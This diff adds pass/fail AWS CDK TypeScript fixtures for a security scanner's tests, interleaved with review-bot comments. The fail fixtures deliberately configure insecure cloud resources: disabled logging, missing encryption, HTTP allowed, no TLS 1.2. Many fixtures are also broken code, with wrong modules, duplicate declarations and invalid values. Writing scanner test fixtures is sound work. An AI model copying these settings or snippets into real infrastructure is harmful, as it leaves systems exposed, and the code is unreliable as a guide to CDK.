new file mode 100644
index 00000000000..26b89d326ba
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/fail.ts
@@ -0,0 +1,19 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration that does not enable field-level logging
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const graphqlApiWithoutLogs = new appsync.GraphqlApi(this, 'apiWithoutLogs', {
+  // other configuration details
+  logConfig: {
+    // Incorrect or missing fieldLogLevel configuration
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `graphqlApiWithoutLogs`.
diff --git a/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/pass.ts b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/pass.ts
new file mode 100644
index 00000000000..a245d7c3e99
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncFieldLevelLogs/pass.ts
@@ -0,0 +1,16 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration that does not enable field-level logging
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should not match the pattern as it includes a logConfig with FieldLogLevel
+const graphqlApiWithLogs = new appsync.GraphqlApi(this, 'apiWithLogs', {
+  // other configuration details
+  logConfig: {
+    fieldLogLevel: appsync.FieldLogLevel.ALL // This is the correct configuration
+  }
+});
diff --git a/cdk_integration_tests/src/typescript/AppSyncLogging/fail.ts b/cdk_integration_tests/src/typescript/AppSyncLogging/fail.ts
new file mode 100644
index 00000000000..035b0049e08
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncLogging/fail.ts
@@ -0,0 +1,19 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const graphqlApiWithoutRole = new appsync.GraphqlApi(this, 'apiWithoutRole', {
+  // other configuration details
+  logConfig: {
+    // log configuration details without role
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `graphqlApiWithoutRole`.
diff --git a/cdk_integration_tests/src/typescript/AppSyncLogging/pass.ts b/cdk_integration_tests/src/typescript/AppSyncLogging/pass.ts
new file mode 100644
index 00000000000..035b0049e08
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AppSyncLogging/pass.ts
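Review bot: The standalone `const logConfig` marked `// FINDING` in AppSyncFieldLevelLogs/pass.ts is the same empty `LogConfig` as in fail.ts and is never passed to `graphqlApiWithLogs`, which configures its logging inline. If the policy also matches `LogConfig` objects that lack `fieldLogLevel` (the `// FINDING` marker suggests it is meant to), this pass fixture would itself raise a finding. Either drop the constant or make it compliant and use it, e.g. `const logConfig: appsync.LogConfig = { fieldLogLevel: appsync.FieldLogLevel.ALL };` and `logConfig,` in the API props.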
@@ -0,0 +1,19 @@
+// Import necessary AWS CDK packages
+import * as appsync from '@aws-cdk/aws-appsync';
+
+// Example of a log configuration
+// FINDING
+const logConfig: appsync.LogConfig = {
+  // log configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const graphqlApiWithoutRole = new appsync.GraphqlApi(this, 'apiWithoutRole', {
+  // other configuration details
+  logConfig: {
+    // log configuration details without role
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `graphqlApiWithoutRole`.
diff --git a/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail.ts b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail.ts
new file mode 100644
index 00000000000..a32f56aa756
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail.ts
@@ -0,0 +1,11 @@
+// Import necessary AWS CDK packages
+import * as athena from '@aws-cdk/aws-athena';
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const workgroupWithoutEnforcement = new athena.CfnWorkGroup(this, 'workgroupWithoutEnforcement', {
+  // other configuration details
+  workGroupConfiguration: {
+    // Workgroup configuration details without enforceWorkGroupConfiguration
+  }
+});
diff --git a/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail__2__.ts b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail__2__.ts
new file mode 100644
index 00000000000..698b7a4257e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/fail__2__.ts
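Review bot: AppSyncLogging/pass.ts is byte-identical to AppSyncLogging/fail.ts — both index lines carry the blob id 035b0049e08 and the bodies match — so the pass fixture declares the same role-less `logConfig`, keeps the `// SINK` marker and still says "The SAST engine should flag 1 vulnerability". A pass fixture needs a configuration the check accepts; from the fail comment ("without role") that is a `logConfig` carrying a `role`, e.g. `logConfig: { role: loggingRole }` with `loggingRole` an `iam.Role` created in the file (constructed example), and the "should flag" comment removed. As committed, the pass case cannot be told apart from the fail case, so whichever expectation the test harness holds for pass.ts is either wrong or vacuous.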
@@ -0,0 +1,14 @@
+// Import necessary AWS CDK packages
+import * as athena from '@aws-cdk/aws-athena';
+
+// Example of a Workgroup configuration
+// FINDING
+const workgroupConfig: athena.CfnWorkGroup.WorkGroupConfigurationProperty = {
+  // Workgroup configuration details
+};
+
+
+const workgroupWithoutEnforcement2 = new athena.CfnWorkGroup(this, 'workgroupWithoutEnforcement', {
+  // other configuration details
+  workGroupConfiguration: workgroupConfig
+});
diff --git a/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/pass.ts b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/pass.ts
new file mode 100644
index 00000000000..c0b0f9eb2a0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AthenaWorkgroupConfiguration/pass.ts
@@ -0,0 +1,18 @@
+// Import necessary AWS CDK packages
+import * as athena from '@aws-cdk/aws-athena';
+
+// Example of a Workgroup configuration
+// FINDING
+const workgroupConfig: athena.CfnWorkGroup.WorkGroupConfigurationProperty = {
+  enforceWorkGroupConfiguration: true
+};
+
+// This should not match the pattern as it includes enforceWorkGroupConfiguration set to true
+const workgroupWithEnforcement = new athena.CfnWorkGroup(this, 'workgroupWithEnforcement', {
+  // other configuration details
+  enforceWorkGroupConfiguration: true
+});
+
+
+// This should not match the pattern as it includes enforceWorkGroupConfiguration set to true
+const workgroupWithEnforcement2 = new athena.CfnWorkGroup(this, 'workgroupWithEnforcement', workgroupConfig);
diff --git a/cdk_integration_tests/src/typescript/AuroraEncryption/fail.ts b/cdk_integration_tests/src/typescript/AuroraEncryption/fail.ts
new file mode 100644
index 00000000000..fbd0347923c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AuroraEncryption/fail.ts
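Review bot: In AthenaWorkgroupConfiguration/pass.ts, `workgroupWithEnforcement` puts `enforceWorkGroupConfiguration: true` directly in the CfnWorkGroup props, whereas the fail fixtures (and the CloudFormation schema) nest it under `workGroupConfiguration`; this pass case is therefore only compliant if the pattern matches the key at any depth, which would also make a misplaced, ineffective setting in a real stack look compliant. The second construct reuses the construct id `'workgroupWithEnforcement'` and passes a `WorkGroupConfigurationProperty` where `CfnWorkGroupProps` is expected. Suggest `workGroupConfiguration: { enforceWorkGroupConfiguration: true }` for the first and `new athena.CfnWorkGroup(this, 'workgroupWithEnforcement2', { workGroupConfiguration: workgroupConfig });` for the second, mirroring fail__2__.ts.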
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AuroraEncryptionStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnDBCluster(this, {})
+    new elbv2.CfnDBCluster(this, {storageEncrypted: false})
+  }
+}
+
+const app = new App();
+new AuroraEncryptionStack(app, 'AuroraEncryptionStack');
diff --git a/cdk_integration_tests/src/typescript/AuroraEncryption/pass.ts b/cdk_integration_tests/src/typescript/AuroraEncryption/pass.ts
new file mode 100644
index 00000000000..41628436f10
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/AuroraEncryption/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class AuroraEncryptionStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnDBCluster(this, {storageEncrypted: true})
+  }
+}
+
+const app = new App();
+new AuroraEncryptionStack(app, 'AuroraEncryptionStack');
diff --git a/cdk_integration_tests/src/typescript/BackupVaultEncrypted/fail.ts b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/fail.ts
new file mode 100644
index 00000000000..07807336181
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class BackupVaultEncryptedStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnBackupVault(this, {})
+    new elbv2.CfnBackupVault(this, {encryptionKeyArn: false})
+  }
+}
+
+const app = new App();
+new BackupVaultEncryptedStack(app, 'BackupVaultEncryptedStack');
diff --git a/cdk_integration_tests/src/typescript/BackupVaultEncrypted/pass.ts b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/pass.ts
new file mode 100644
index 00000000000..3284ef95d11
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/BackupVaultEncrypted/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class BackupVaultEncryptedStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnBackupVault(this, {encryptionKeyArn: true})
+  }
+}
+
+const app = new App();
+new BackupVaultEncryptedStack(app, 'BackupVaultEncryptedStack');
diff --git a/cdk_integration_tests/src/typescript/CloudFrontTLS12/fail.ts b/cdk_integration_tests/src/typescript/CloudFrontTLS12/fail.ts
new file mode 100644
index 00000000000..01bd305911a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudFrontTLS12/fail.ts
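Review bot: `encryptionKeyArn: true` in BackupVaultEncrypted/pass.ts (and `false` in fail.ts) gives a boolean to a property that holds a KMS key ARN string, so the pass case is compliant only if the check tests truthiness rather than the presence of a string value, and the `false` variant tests a shape no real stack has. A placeholder ARN string keeps the fixture representative while still satisfying a presence check: `new elbv2.CfnBackupVault(this, {encryptionKeyArn: '<kms-key-arn>'})` (placeholder). The omitted-property case already in fail.ts is the realistic non-compliant shape; the `encryptionKeyArn: false` line can go.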
@@ -0,0 +1,20 @@
+// Import necessary AWS CDK packages
+import * as cloudfront from '@aws-cdk/aws-cloudfront';
+import { Construct } from '@aws-cdk/core';
+
+// Example of a ViewerCertificateProperty that does not specify TLS v1.2
+// FINDING
+const viewerCertificateConfig: cloudfront.CfnDistribution.ViewerCertificateProperty = {
+  // Viewer certificate configuration details
+};
+
+// This should match the pattern and be flagged as a vulnerability
+// SINK
+const distributionWithoutTLSv12 = new cloudfront.CfnDistribution(new Construct(), 'distributionWithoutTLSv12', {
+  // other configuration details
+  viewerCertificate: {
+    // Incorrect or missing minimumProtocolVersion configuration
+  }
+});
+
+// The SAST engine should flag 1 vulnerability: `distributionWithoutTLSv12`.
diff --git a/cdk_integration_tests/src/typescript/CloudFrontTLS12/pass.ts b/cdk_integration_tests/src/typescript/CloudFrontTLS12/pass.ts
new file mode 100644
index 00000000000..a24db7f021e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudFrontTLS12/pass.ts
@@ -0,0 +1,17 @@
+// Import necessary AWS CDK packages
+import * as cloudfront from '@aws-cdk/aws-cloudfront';
+import { Construct } from '@aws-cdk/core';
+
+// Example of a ViewerCertificateProperty that does not specify TLS v1.2
+// FINDING
+const viewerCertificateConfig: cloudfront.CfnDistribution.ViewerCertificateProperty = {
+  // Viewer certificate configuration details
+};
+
+// This should not match the pattern as it includes a ViewerCertificate with TLSv1.2
+const distributionWithTLSv12 = new cloudfront.CfnDistribution(new Construct(), 'distributionWithTLSv12', {
+  // other configuration details
+  viewerCertificate: {
+    minimumProtocolVersion: 'TLSv1.2' // This is the correct configuration
+  }
+});
diff --git a/cdk_integration_tests/src/typescript/CloudTrailLogValidation/fail.ts b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/fail.ts
new file mode 100644
index 00000000000..4b00c22df68
--- /dev/null
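Review bot: `minimumProtocolVersion: 'TLSv1.2'` in CloudFrontTLS12/pass.ts is not a value CloudFormation accepts for ViewerCertificate.MinimumProtocolVersion; the TLS 1.2 security policies are named `TLSv1.2_2018`, `TLSv1.2_2019` and `TLSv1.2_2021`. If the check compares exactly, this pass fixture never reaches the compliant branch; if it matches on a prefix, the fixture should still use the value a real, deployable stack would carry. Suggest `minimumProtocolVersion: 'TLSv1.2_2021' // This is the correct configuration`. The `viewerCertificateConfig` constant marked `// FINDING` is copied from fail.ts, is empty and unused, and could trigger the same pattern the pass case is meant to avoid; drop it or give it a compliant value.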
+++ b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/fail.ts
@@ -0,0 +1,15 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class CloudTrailLogValidationStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnTrail(this, {})
+    new elbv2.CfnTrail(this, {enableLogFileValidation: false})
+  }
+}
+
+const app = new App();
+new CloudTrailLogValidationStack(app, 'CloudTrailLogValidationStack');
diff --git a/cdk_integration_tests/src/typescript/CloudTrailLogValidation/pass.ts b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/pass.ts
new file mode 100644
index 00000000000..596d72b0e16
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudTrailLogValidation/pass.ts
@@ -0,0 +1,14 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import { aws_elasticloadbalancingv2 as elbv2 } from 'aws-cdk-lib';
+
+class CloudTrailLogValidationStack extends Stack {
+  constructor(scope: Construct, id: string, props?: StackProps) {
+    super(scope, id, props);
+
+    new elbv2.CfnTrail(this, {enableLogFileValidation: true})
+  }
+}
+
+const app = new App();
+new CloudTrailLogValidationStack(app, 'CloudTrailLogValidationStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/fail.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/fail.ts
new file mode 100644
index 00000000000..79f42c57518
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/fail.ts
@@ -0,0 +1,20 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    new logs.LogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      removalPolicy: cdk.RemovalPolicy.DESTROY, // Setting removal policy
+      retention: logs.RetentionDays.ONE_MONTH, // Set the retention policy as needed
+    });
+
+    // You can add other resources or configurations to the stack here
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/pass.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/pass.ts
new file mode 100644
index 00000000000..03c27935ec6
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupKMSKey/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+import * as kms from 'aws-cdk-lib/aws-kms';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    new logs.LogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      removalPolicy: cdk.RemovalPolicy.DESTROY, // Setting removal policy
+      retention: logs.RetentionDays.ONE_MONTH, // Set the retention policy as needed
+      encryptionKey: new kms.Key(this, 'Key'),
+    });
+
+    // You can add other resources or configurations to the stack here
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/fail.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/fail.ts
new file mode 100644
index 00000000000..043bf2885dc
--- /dev/null
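Review bot: `constructor(scope: cdk.Construct, ...)` in CloudWatchLogGroupKMSKey/fail.ts refers to a class that aws-cdk-lib (v2) does not export; with v2 imports `Construct` comes from the `constructs` package, which the other fixtures in this change already use (`import { Construct } from 'constructs'`). The same signature is repeated in CloudWatchLogGroupKMSKey/pass.ts, both CloudWatchLogGroupRetention files, both CloudfrontDistributionEncryption files and CloudfrontDistributionLogging/fail__2__.ts. Suggest `import { Construct } from 'constructs';` and `constructor(scope: Construct, id: string, props?: cdk.StackProps)` in each, so the fixtures match the import style of the rest of the suite and compile under v2.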
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/fail.ts
@@ -0,0 +1,21 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating a CloudFormation LogGroup resource
+    const logGroup = new logs.CfnLogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      kmsKeyId: '1', // Specify the KMS key ID
+    });
+
+    // Optionally set removal policy
+    logGroup.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/pass.ts b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/pass.ts
new file mode 100644
index 00000000000..78b5e892a5b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudWatchLogGroupRetention/pass.ts
@@ -0,0 +1,22 @@
+import * as cdk from 'aws-cdk-lib';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class MyLogGroupStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating a CloudFormation LogGroup resource
+    const logGroup = new logs.CfnLogGroup(this, 'MyLogGroup', {
+      logGroupName: 'MyLogGroupName', // Name of the log group
+      retentionInDays: 30, // Set the retention policy as needed
+      kmsKeyId: '1', // Specify the KMS key ID
+    });
+
+    // Optionally set removal policy
+    logGroup.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY);
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new MyLogGroupStack(app, 'MyLogGroupStack');
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/fail__2__.ts
new file mode 100644
index 00000000000..fbcf72be121
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/fail__2__.ts
@@ -0,0 +1,57 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as origins from 'aws-cdk-lib/aws-cloudfront-origins';
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution
+    const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          targetOriginId: 'myOrigin1',
+          viewerProtocolPolicy: 'allow-all',
+        },
+        origins: [
+          {
+            id: 'myOrigin1',
+            domainName: 'my-bucket.s3.amazonaws.com',
+            s3OriginConfig: {},
+          },
+        ],
+        enabled: true,
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution using the Distribution construct
+    const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+      defaultBehavior: {
+        origin: myOrigin,
+        viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.ALLOW_ALL, // Allow all protocols
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
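Review bot: CloudfrontDistributionEncryption/fail__2__.ts declares `export class CloudFrontStack` and `const app` twice in one module, which TypeScript rejects as duplicate identifiers; if the `CfnDistribution` and `Distribution` variants are two cases, they belong in separate fixtures, which the `fail.ts`/`fail__2__.ts` naming already supports. `myOrigin` in the first class is created and never referenced, since the Cfn variant configures its origin inline. The same duplicated declarations appear in CloudfrontDistributionEncryption/pass.ts and CloudfrontDistributionLogging/fail__2__.ts.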
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/pass.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/pass.ts
new file mode 100644
index 00000000000..95d4e863320
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionEncryption/pass.ts
@@ -0,0 +1,55 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as origins from 'aws-cdk-lib/aws-cloudfront-origins';
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution
+    const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+      distributionConfig: {
+        defaultCacheBehavior: {
+          targetOriginId: 'myOrigin1',
+          viewerProtocolPolicy: 'redirect-to-https',
+        },
+        origins: [
+          {
+            id: 'myOrigin1',
+            domainName: 'my-bucket.s3.amazonaws.com',
+            s3OriginConfig: {},
+          },
+        ],
+        enabled: true,
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+export class CloudFrontStack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Creating an origin for the CloudFront distribution
+    const myOrigin = new origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+    // Creating a CloudFront distribution using the Distribution construct
+    const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+      defaultBehavior: {
+        origin: myOrigin,
+        viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.REDIRECT_TO_HTTPS, // Allow all protocols
+      },
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/fail__2__.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/fail__2__.ts
new file mode 100644
index 00000000000..08963977f26
--- /dev/null
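Review bot: The comment `// Allow all protocols` beside `cloudfront.ViewerProtocolPolicy.REDIRECT_TO_HTTPS` in CloudfrontDistributionEncryption/pass.ts was carried over from the fail fixture and now states the opposite of the value; suggest `// Redirect HTTP to HTTPS`. The unused `myOrigin` in the Cfn variant and the missing trailing newline could be tidied in the same pass.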
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/fail__2__.ts 
@@ -0,0 +1,72 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class CloudFrontStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // S3 bucket for storing CloudFront access logs
+ const logBucket = new s3.Bucket(this, 'LogBucket');
+
+ // Creating an origin for the CloudFront distribution
+ const myOrigin = new cloudfront.Origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+ // Creating a CloudFront distribution using the Distribution construct
+ const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+ defaultBehavior: {
+ origin: myOrigin,
+ viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.ALLOW_ALL,
+ },
+ enableLogging: false, // Enable access logging
+ logBucket: logBucket,
+ logFilePrefix: 'cf-access-logs/', // Optional: prefix for log file names
+ });
+
+ // Optionally grant CloudFront permission to write access logs to the S3 bucket
+ logBucket.grantWrite(distribution.logBucketDelivery);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+
+
+export class CloudFrontStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // S3 bucket for storing CloudFront access logs
+ const logBucket = new s3.Bucket(this, 'LogBucket');
+
+ // Creating an origin for the CloudFront distribution
+ const myOrigin = new cloudfront.CfnDistribution.OriginProperty({
+ domainName: 'my-bucket.s3.amazonaws.com',
+ id: 'myOrigin',
+ s3OriginConfig: {},
+ });
+
+ // Creating a CloudFront distribution using the CfnDistribution construct
+ const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+ distributionConfig: {
+ defaultCacheBehavior: {
+ targetOriginId: 'myOrigin',
+ viewerProtocolPolicy: 'allow-all',
+ },
+ origins: [myOrigin],
+ enabled: true,
+ },
+ });
+
+ // Optionally grant CloudFront permission to write access logs to the S3 bucket
+ logBucket.grantWrite(distribution.logBucketDeliveryWrite);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
diff --git a/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/pass.ts b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/pass.ts
new file mode 100644
index 00000000000..133c1e25ab2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/CloudfrontDistributionLogging/pass.ts
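Review bot: `enableLogging: false, // Enable access logging` in the first stack documents the opposite of the value; since this is the failing fixture the comment should say so, e.g. `enableLogging: false, // access logging disabled: expected finding`. The `logs` import is unused in both stacks and can be dropped. A reader may try to synthesize this file, so a one-line header stating that it is a static-analysis fixture and is not expected to compile or deploy (the duplicate `CloudFrontStack`/`app` declarations and the `logBucketDelivery*` properties would otherwise look like errors) would help.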
@@ -0,0 +1,74 @@
+import * as cdk from 'aws-cdk-lib';
+import * as cloudfront from 'aws-cdk-lib/aws-cloudfront';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+import * as logs from 'aws-cdk-lib/aws-logs';
+
+export class CloudFrontStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // S3 bucket for storing CloudFront access logs
+ const logBucket = new s3.Bucket(this, 'LogBucket');
+
+ // Creating an origin for the CloudFront distribution
+ const myOrigin = new cloudfront.Origins.S3Origin({ domainName: 'my-bucket.s3.amazonaws.com' });
+
+ // Creating a CloudFront distribution using the Distribution construct
+ const distribution = new cloudfront.Distribution(this, 'MyDistribution', {
+ defaultBehavior: {
+ origin: myOrigin,
+ viewerProtocolPolicy: cloudfront.ViewerProtocolPolicy.ALLOW_ALL,
+ },
+ enableLogging: true, // Enable access logging
+ logBucket: logBucket,
+ logFilePrefix: 'cf-access-logs/', // Optional: prefix for log file names
+ });
+
+ // Optionally grant CloudFront permission to write access logs to the S3 bucket
+ logBucket.grantWrite(distribution.logBucketDelivery);
+ }
+}
+
+// Example usage
+const app = new cdk.App();
+new CloudFrontStack(app, 'CloudFrontStack');
+
+export class CloudFrontStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // S3 bucket for storing CloudFront access logs
+ const logBucket = new s3.Bucket(this, 'LogBucket');
+
+ // Creating an origin for the CloudFront distribution
+ const myOrigin = new cloudfront.CfnDistribution.OriginProperty({
+ domainName: 'my-bucket.s3.amazonaws.com',
+ id: 'myOrigin',
+ s3OriginConfig: {},
+ });
+
+ // Creating a CloudFront distribution using the CfnDistribution construct
+ const distribution = new cloudfront.CfnDistribution(this, 'MyDistribution', {
+ distributionConfig: {
+ defaultCacheBehavior: {
+ targetOriginId: 'myOrigin',
+ viewerProtocolPolicy: 'allow-all',
+ },
+ origins: [myOrigin],
+ enabled: true,
